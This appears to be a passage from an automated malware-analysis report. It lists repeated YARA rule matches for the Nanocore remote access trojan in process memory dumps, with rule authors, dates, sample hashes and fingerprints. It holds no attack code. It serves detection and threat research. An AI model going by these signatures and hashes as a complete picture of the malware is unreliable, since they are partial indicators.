      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
